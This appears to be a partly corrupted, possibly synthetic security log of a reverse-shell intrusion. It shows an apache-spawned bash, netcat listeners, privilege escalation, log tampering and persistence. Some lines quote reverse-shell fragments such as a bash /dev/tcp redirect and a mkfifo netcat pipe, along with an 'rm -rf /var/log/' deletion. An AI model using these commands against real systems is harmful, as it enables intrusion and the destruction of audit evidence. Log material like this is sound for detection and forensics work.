[2024-01-15T03:42:17Z] AUTHENTICATION: Failed SSH login attempt from 192.168.1.45
[2024-01-15T03:42:23Z] AUTHENTICATION: Failed SSH login attempt from 192.168.1.45
[03:42:31] CONNECTION_ATTEMPT: Unusual outbound connection detected on port 4444
[2024-01-15 03:42:45] PROCESS_SPAWN: /bin/bash spawned by apache user (PID: 8471)
[CORRUPTED] SHELL_EXEC: ████████ -e /bin/sh ████████
[ ] CONNECTION_ATTEMPT: Reverse connection established to external host
[2024-01-15T03:43:12Z] FILE_MODIFIED: /tmp/.hidden_payload modified
[03:43:18] PROCESS_SPAWN: nc process detected (PID: 8502) parent: bash
[DATA LOST] ...attempting bind on port 5555...
[2024-01-15T03:43:29Z] SHELL_EXEC: Command execution detected: whoami
[CORRUPTED] NETWORK: ▓▓▓.▓▓▓.1.45:7777 -> ▓▓▓.▓▓▓.▓▓▓.▓▓▓:????
[03:43:45] FILE_MODIFIED: /var/log/auth.log timestamps altered
[ ] PROCESS_SPAWN: Suspicious child process from apache worker
[2024-01-15T03:44:02Z] SHELL_EXEC: ...nc -l -p ...█████... -e ...
[January 15 03:44:15] CONNECTION_ATTEMPT: Port 4444 listener established
[CORRUPTED] ████: bash -i >& /dev/tcp/████/4444 0>&1
[2024-01-15T03:44:33Z] AUTHENTICATION: Privilege escalation attempt detected
[03:44:41] SHELL_EXEC: Command execution: id, uname -a, pwd
[DATA LOST] ...reverse shell payload delivered via...
[ ] FILE_MODIFIED: /etc/crontab ??? timestamp: ???
[2024-01-15T03:45:08Z] NETWORK: Sustained connection on port 7777 duration: 127 seconds
[CORRUPTED] PROCESS_SPAWN: /bin/sh -i spawned ▓▓▓▓▓
[03:45:22] SHELL_EXEC: wget command detected downloading from external source
[2024-01-15 03:45:39] FILE_MODIFIED: /tmp/nc binary uploaded size: 28KB
[ ] CONNECTION_ATTEMPT: ...failed...retrying on alternate port...
[DATA LOST] ...mkfifo /tmp/f; cat /tmp/f | /bin/sh...
[2024-01-15T03:46:11Z] PROCESS_SPAWN: netcat listening mode active
[03:46:18] SHELL_EXEC: ???????????????????
[CORRUPTED] NETWORK: bidirectional traffic █████ port 5555 █████
[2024-01-15T03:46:45Z] AUTHENTICATION: Root shell access confirmed
[January 15 03:47:03] FILE_MODIFIED: Multiple files in /var/www/html altered
[ ] SHELL_EXEC: ...rm -rf /var/log/...
[2024-01-15T03:47:29Z] CONNECTION_ATTEMPT: Connection closed by remote host
[DATA LOST] ...persistence mechanism installed...
[03:47:51] PROCESS_SPAWN: Orphaned process detected maintaining connection